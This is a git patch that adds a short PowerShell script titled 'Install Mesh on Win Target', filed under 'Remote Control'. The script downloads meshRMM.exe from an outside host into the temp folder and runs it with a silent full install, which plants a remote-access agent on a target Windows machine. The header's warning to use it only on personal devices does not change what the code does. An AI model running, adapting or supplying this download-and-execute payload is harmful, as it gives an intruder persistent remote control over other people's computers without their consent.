From 7238676a25eed9d1253345f50f0c3d8b6296ec79 Mon Sep 17 00:00:00 2001 From: Didier Asechimann Date: Tue, 21 Oct 2025 18:30:31 -0400 Subject: [PATCH] Upload New File --- PS1/mesh.ps1 | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 PS1/mesh.ps1 diff --git a/PS1/mesh.ps1 b/PS1/mesh.ps1 new file mode 100644 index 0000000..8084fca --- /dev/null +++ b/PS1/mesh.ps1 @@ -0,0 +1,19 @@ + +############################################################################################## +# _;~) (~;_ # +# ( | | ) # +# Title : Install Mesh on Win Target ~', ', ,''~'', ,' ,'~ # +# Author : DAProgs ', ',' ',' ,' # +# Version : 1.0 ',: {'} {'} :,' # +# Category : Remote Control ; /^\ ; # +# Target : Windows 10, 11 ~\ ~ /~ # +# ,' ,~~~~~, ', # +# My crime is that of curiosity ,' ,' ;~~~; ', ', # +# ,' ,' ''' ', ', # +# Use these scripts only for experimenting on your (~ ; ; ~) # +# personnal devices -;_) (_;- # +############################################################################################## + +$outFile = $env:TEMP + '\mesh.exe' +Start-BitsTransfer -Source "https://www.home.daprogs.net/dl/meshRMM.exe" -Destination $outFile +Start-Process -FilePath $outFile -ArgumentList ('-fullinstall')